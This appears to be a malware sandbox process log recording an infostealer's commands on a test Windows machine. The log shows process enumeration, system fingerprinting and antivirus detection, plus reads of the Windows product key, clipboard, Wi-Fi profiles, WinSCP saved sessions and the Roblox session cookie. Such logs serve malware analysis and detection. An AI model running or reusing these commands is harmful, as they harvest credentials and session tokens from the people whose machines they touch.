C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1872
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1952
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1532
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1436
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3076
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4764
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2576
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1940
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4700
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3720
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1480
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4804
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4180
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4148
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4164
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3956
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:4188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:212
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3036
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:224
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3840
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3812
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3640
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1020
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2216
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4644
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4656
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4140
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1220
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5020
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5124
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5144
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5156
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5176
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5200
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5220
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5232
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5264
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5272
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5280
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "net session"2⤵PID:5292
-
C:\Windows\system32\net.exenet session3⤵PID:7312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:8316
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵PID:5308
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:7624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"2⤵PID:5324
-
C:\Windows\System32\Wbem\WMIC.exewmic OS get caption, osarchitecture3⤵PID:7248
-
-
C:\Windows\system32\more.commore +13⤵PID:7576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"2⤵PID:8988
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵PID:8092
-
-
C:\Windows\system32\more.commore +13⤵PID:8120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"2⤵PID:3928
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController get name3⤵
- Detects videocard installed
PID:9616
-
-
C:\Windows\system32\more.commore +13⤵PID:7576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"2⤵PID:8932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault3⤵
- Suspicious behavior: EnumeratesProcesses
PID:10064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"2⤵PID:6100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:9616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:10308
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:10348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4840 get ExecutablePath"2⤵PID:10780
-
C:\Windows\System32\Wbem\WMIC.exewmic process where processid=4840 get ExecutablePath3⤵PID:10824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""2⤵PID:10892
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"3⤵PID:10932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""2⤵PID:10952
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"3⤵PID:10996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""2⤵PID:11012
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"3⤵PID:11052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""2⤵PID:11076
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"3⤵PID:11112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""2⤵PID:11132
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"3⤵PID:11168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""2⤵PID:11188
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"3⤵PID:11220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""2⤵PID:11236
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"3⤵PID:5868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""2⤵PID:10248
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"3⤵PID:10276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""2⤵PID:4432
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"3⤵PID:5668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""2⤵PID:7248
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"3⤵PID:3532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""2⤵PID:9348
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"3⤵PID:9420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""2⤵PID:9376
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"3⤵PID:9424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""2⤵PID:9604
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"3⤵PID:9732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""2⤵PID:10396
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"3⤵PID:6832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""2⤵PID:3764
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"3⤵PID:8292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""2⤵PID:5264
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"3⤵PID:7596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""2⤵PID:1172
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"3⤵PID:3264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""2⤵PID:4352
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"3⤵PID:4368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""2⤵PID:5356
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"3⤵PID:5620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""2⤵PID:10404
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"3⤵PID:6248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""2⤵PID:10432
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"3⤵PID:7476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""2⤵PID:8316
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"3⤵PID:6320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""2⤵PID:8396
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"3⤵PID:7040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""2⤵PID:7656
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"3⤵PID:6756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""2⤵PID:5988
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"3⤵PID:8484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""2⤵PID:2316
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"3⤵PID:10460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""2⤵PID:8036
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"3⤵PID:5212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""2⤵PID:6940
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"3⤵PID:8764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""2⤵PID:8812
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"3⤵PID:8444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""2⤵PID:7724
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"3⤵PID:5020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""2⤵PID:5548
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"3⤵PID:8404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""2⤵PID:5280
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"3⤵PID:8128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""2⤵PID:5692
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"3⤵PID:8996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\kbuL5EmJfXIQ_tezmp.ps1""2⤵PID:7344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\kbuL5EmJfXIQ_tezmp.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\RGyqVfeN3YcR.vbs"2⤵PID:5032
-
C:\Windows\system32\cscript.execscript C:\Users\Admin\AppData\Roaming\RGyqVfeN3YcR.vbs3⤵PID:5952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""2⤵PID:6440
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "function Get-AntiVirusProduct {3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4708
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Suspicious behavior: EnumeratesProcesses
PID:8692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"2⤵PID:6688
-
C:\Windows\system32\netsh.exenetsh wlan show profile3⤵PID:8028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""2⤵PID:3088
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"3⤵PID:7952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"2⤵PID:5796
-
